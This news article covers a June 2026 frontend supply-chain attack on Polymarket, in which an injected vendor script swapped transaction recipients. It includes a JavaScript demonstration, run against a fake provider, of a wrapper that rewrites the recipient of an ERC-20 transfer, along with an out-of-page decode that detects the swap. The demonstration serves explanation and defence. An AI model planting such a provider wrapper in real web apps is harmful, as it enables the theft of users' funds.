Polymarket $2.9M Theft: Third-Party Vendor Attack and Full User Refund

June 26, 2026 | 2 min read

Prediction market Polymarket confirmed a $2.9 million cryptocurrency theft. Attackers injected a malicious script into the platform's frontend through a compromised third-party vendor, draining funds from user wallets in real time as victims signed transactions. The company has removed the compromised component and promised full refunds to all affected users.

How the Attack Unfolded

The incident took place on June 25, 2026. Hackers chose a supply chain vector: they compromised a third-party contractor whose JavaScript code was integrated into Polymarket's frontend infrastructure, then planted a malicious script inside that dependency. The script loaded automatically in every visitor's browser and ran during normal use of the platform.

The Polymarket team described the incident as a vendor compromise: the breach originated not in the company's own systems but in one of its technology partners. Because the change never touched Polymarket's own repositories, nothing on their side flagged it, and the script stayed live for a period of time. Once loaded, it intercepted transaction details in the victim's browser and redirected funds to attacker-controlled addresses.

This approach is harder to detect than an attack on the platform's own code. Attackers leave the smart contracts untouched and instead target the software supply chain the frontend relies on. Standard on-chain audits do not cover this vector at all.

Scope of Losses and Affected Assets

The total amount stolen came to $2.9 million. Polymarket is built on the Polygon network and uses USDC as its primary settlement asset for prediction bets. User funds are held in the platform's smart contract and moved by transactions the user signs with a browser wallet.

The malicious script targeted exactly that signing step. It swapped the recipient address into the transaction just before the wallet prompted for confirmation, so the victim saw the expected amount while the funds went to an attacker-controlled address. The company has not disclosed the exact number of affected addresses.

According to Decrypt, Polymarket received the first signal when users reported unauthorized transactions. The team quickly removed the compromised dependency and suspended parts of the infrastructure to audit adjacent components.

Polymarket confirmed the compromised dependency has been removed and new transactions are safe. All affected users will receive a full refund.

Polymarket's Response

After discovering the breach, the platform removed the malicious component, audited adjacent dependencies, and restored normal service. According to the team, there is no remaining risk to user funds.

The decision to refund users was made independently, without regulatory pressure. The payout mechanism and exact timeline have not been announced. The company says it will contact affected addresses directly to confirm the amount of each loss.

  • Compromised dependency removed from production infrastructure
  • Adjacent components and external SDKs audited
  • Refunds will cover 100% of confirmed losses
  • Payment timeline is still being finalized

The Supply Chain Threat Is Not Going Away

This incident followed a series of attacks that made Q2 2026 a record quarter for DeFi losses. According to Immunefi, 83 attacks were recorded with combined losses of $755 million. Frontend supply chain vulnerabilities through npm packages and third-party SDKs ranked among the top attack vectors alongside smart contract exploits.

Modern web3 applications depend on hundreds of external libraries. Smart contract audits check on-chain logic but not the frontend JavaScript that builds transactions. The browser is where a transaction request is assembled and handed to the wallet for signing, so a script injected there can alter the request before any on-chain logic sees it, and contract-level defenses cannot block that.

The practical fix for end users is verifying every transaction on a hardware wallet like Ledger. A malicious script can still alter the request, but the device displays the recipient and amount it is actually about to sign, so the swap is visible before confirmation. That only helps when the user reads the device screen rather than blind-signing, and it does not eliminate every risk, but it makes recipient swaps against such users close to useless.
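The mechanism described in the two passages above (a script in the page rewriting the recipient while the UI shows the intended one, and an out-of-band decode of the signed bytes catching the swap), as an added example. This is not Polymarket's code and not the injected script; the addresses, the token contract, the provider stub and the amount are all constructed for the run. It encodes an ERC-20 `transfer(address,uint256)` call by hand (USDC is an ERC-20 token), wraps an EIP-1193-style `request` method the way an injected script could, and then decodes the calldata the wallet was actually handed, which is what a hardware wallet screen shows.

```javascript
// Added example, not Polymarket's code or the real injected script. It models the attack
// class the article describes: a third-party script wrapping the page's wallet provider
// and rewriting the recipient of an ERC-20 transfer before the signing request leaves the
// browser. Every address and the token contract below are made up.

const TRANSFER_SELECTOR = "a9059cbb"; // first 4 bytes of keccak256("transfer(address,uint256)")

// Left-pad a hex string (with or without 0x) to one 32-byte ABI word.
function pad32(hex) {
  return hex.toLowerCase().replace(/^0x/, "").padStart(64, "0");
}

// Calldata for transfer(to, amount), as a dApp frontend builds it before asking the wallet to sign.
function encodeTransfer(to, amount) {
  return "0x" + TRANSFER_SELECTOR + pad32(to) + pad32(BigInt(amount).toString(16));
}

// Decode transfer calldata back into recipient and amount. This is what a hardware wallet
// (or any check outside the page) does with the raw bytes: it never sees the page's UI.
function decodeTransfer(data) {
  const hex = data.replace(/^0x/, "").toLowerCase();
  if (hex.slice(0, 8) !== TRANSFER_SELECTOR || hex.length !== 8 + 64 + 64) {
    throw new Error("not an ERC-20 transfer call");
  }
  return {
    to: "0x" + hex.slice(8 + 24, 8 + 64), // address is the low 20 bytes of the first word
    amount: BigInt("0x" + hex.slice(72)),
  };
}

// Stand-in for window.ethereum. Real providers return promises; this one is synchronous
// so the run is deterministic. It records what it was asked to sign instead of prompting.
class FakeProvider {
  constructor() { this.signed = []; }
  request({ method, params }) {
    if (method !== "eth_sendTransaction") throw new Error("unsupported: " + method);
    this.signed.push(params[0]);
    return "0x" + "11".repeat(32); // fake transaction hash
  }
}

// The injected wrapper: same interface as the provider, but any transfer calldata passing
// through gets its recipient replaced. The amount is kept so the wallet prompt looks normal.
function injectAddressSwap(provider, attackerAddress) {
  const original = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method !== "eth_sendTransaction") return original(args);
    const tx = { ...args.params[0] };
    try {
      const { amount } = decodeTransfer(tx.data);
      tx.data = encodeTransfer(attackerAddress, amount);
    } catch (_) { /* not a transfer call; pass through untouched */ }
    return original({ ...args, params: [tx] });
  };
  return provider;
}

// Honest dApp flow. Note that tx.to is the token contract, not the recipient: the recipient
// lives inside calldata, which is why a wallet prompt showing only "to" cannot reveal the swap.
function sendUsdc(provider, from, token, to, amount) {
  provider.request({ method: "eth_sendTransaction", params: [{ from, to: token, data: encodeTransfer(to, amount) }] });
  return { shownToUser: to.toLowerCase(), signed: provider.signed[provider.signed.length - 1] };
}

// Scenario: what the page displayed versus what the wallet was actually asked to sign.
function demo() {
  const USER = "0x" + "aa".repeat(20);
  const USDC = "0x" + "cc".repeat(20);      // constructed token address, not the real Polygon USDC
  const INTENDED = "0x" + "bb".repeat(20);
  const ATTACKER = "0x" + "ee".repeat(20);
  const amount = 2900000n * 10n ** 6n;      // USDC has 6 decimals; 2.9M USDC, constructed

  const provider = injectAddressSwap(new FakeProvider(), ATTACKER);
  const result = sendUsdc(provider, USER, USDC, INTENDED, amount);
  const onDevice = decodeTransfer(result.signed.data); // what a hardware wallet screen decodes

  return {
    uiRecipient: result.shownToUser,
    signedRecipient: onDevice.to,
    amountMatches: onDevice.amount === amount,
    mismatchDetected: onDevice.to !== result.shownToUser,
  };
}

console.log(demo());
```

The run shows the amount unchanged while `signedRecipient` differs from `uiRecipient`. A check that lives in the same page as the injected script can be wrapped just as easily as the provider was, which is why the comparison has to happen somewhere the script cannot reach: the device screen, or a second decode of the raw calldata outside the browser.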

Polymarket remains one of the largest prediction markets in crypto. Its choice to refund users voluntarily may set a precedent for other DeFi platforms facing similar incidents.
